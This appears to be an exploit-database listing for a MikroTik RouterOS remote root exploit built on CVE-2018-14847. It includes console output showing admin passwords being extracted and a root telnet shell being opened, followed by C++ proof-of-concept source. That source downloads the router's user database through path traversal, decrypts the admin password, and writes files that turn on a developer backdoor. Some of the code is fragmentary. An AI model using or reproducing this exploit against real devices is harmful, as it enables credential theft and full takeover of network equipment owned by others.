Exploits / Vulnerability Discovered : 2018-10-10 |
Type : remote |
Platform : hardware
This exploit / vulnerability Microtik routeros < 6.43rc3 remote root is for educational purposes only and if it is used you will do on your own risk!
The exploit can be found here: https://github.com/tenable/routeros/tree/master/poc/bytheway
The exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an "option" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user "devel" with the admin's password.
Mikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:
[+] Extracting passwords from
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on
[+] Creating /flash/nova/etc/devel-login on
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel
Connected to
Escape character is '^]'.
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
#include <sstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
const char s_version[] = "By the Way 1.0.0";
* Parses the command line arguments. The program will always use two
* parameters (ip and winbox port) but the port will default to 8291 if
* not present on the CLI
* \param[in] p_arg_count the number of arguments on the command line
* \param[in] p_arg_array the arguments passed on the command line
* \param[in,out] p_ip the ip address to connect to
* \param[in,out] p_winbox_port the winbox port to connect to
* \return true if we have valid ip and ports. false otherwise.
bool parseCommandLine(int p_arg_count, const char* p_arg_array[],
std::string& p_ip, std::string& p_winbox_port)
boost::program_options::options_description description("options");
("help,h", "A list of command line options")
("version,v", "Display version information")
("winbox-port,w", boost::program_options::value<std::string>()->default_value("8291"), "The winbox port")
("ip,i", boost::program_options::value<std::string>(), "The ip to connect to");
* This function uses the file disclosure vulnerability, CVE-2018-14847, to
* download the user database from /flash/rw/store/user.dat
* \param[in] p_ip the address of the router to connect to
* \param[in] p_winbox_port the winbox port to connect to
* \return a string containing the user.dat data or an empty string on error
std::string getPasswords(const std::string& p_ip, const std::string& p_winbox_port)
std::cout << "[+] Extracting passwords from " << p_ip << ":" << p_winbox_port << std::endl;
Winbox_Session winboxSession(p_ip, p_winbox_port);
if (!winboxSession.connect())
std::cerr << "[!] Failed to connect to the remote host" << std::endl;
return std::string();
if (!winboxSession.receive(msg))
std::cerr << "[!] Error receiving a file content response." << std::endl;
return std::string();
return msg.get_raw(0x03);
* Looks through the user.dat file for an enabled administrative account that
* we can use. Once a useful account is found the password is decrypted.
* \param[in] p_user_dat the user.dat file data
* \param[in,out] p_username stores the found admin username
* \param[in,out] p_password stores the found admin password
* \return true on success and false otherwrise
bool get_password(const std::string p_user_dat, std::string& p_username, std::string& p_password)
std::cout << "[+] Searching for administrator credentials " << std::endl;
// the dat file is a series of nv::messages preceded by a two byte length
std::string dat(p_user_dat);
while (dat.size() > 4)
boost::uint16_t length = *reinterpret_cast<const boost::uint16_t*>(&dat[0]);
if (dat[2] != 'M' || dat[3] != '2')
// this is mild insanity but the .dat file messages don't line
// up properly if a new user is added or whatever.
dat.erase(0, 1);
dat.erase(0, 4);
length -= 4;
// we need an active admin account
// 0x2 has three groups: 1 (read), 2 (write), 3 (full)
if (msg.get_u32(2) == 3 && msg.get_boolean(0xfe000a) == false)
for (std::size_t i = 0; i < encrypted_pass.size(); i++)
boost::uint8_t decrypted = encrypted_pass[i] ^ md5_hash[i % md5_hash.size()];
if (decrypted == 0)
// a null terminator! We did it.
return true;
return false;
* This function creates the file /pckg/option on the target. This will enable
* the developer login on Telnet and SSH. Oddly, you'll first need to log in
* to Telnet for SSH to work, but I digress...
* \param[in] p_ip the ip address of the router
* \param[in] p_port the port of the jsproxy we'll connect to
* \param[in] p_username the username we'll authenticate with
* \param[in] p_password the password we'll authenticate with
* \return true if we successfully created the file.
bool create_file(const std::string& p_ip, const std::string& p_port,
const std::string& p_username, const std::string& p_password)
Winbox_Session mproxy_session(p_ip, p_port);
if (!mproxy_session.connect())
std::cerr << "[-] Failed to connect to the remote host" << std::endl;
return false;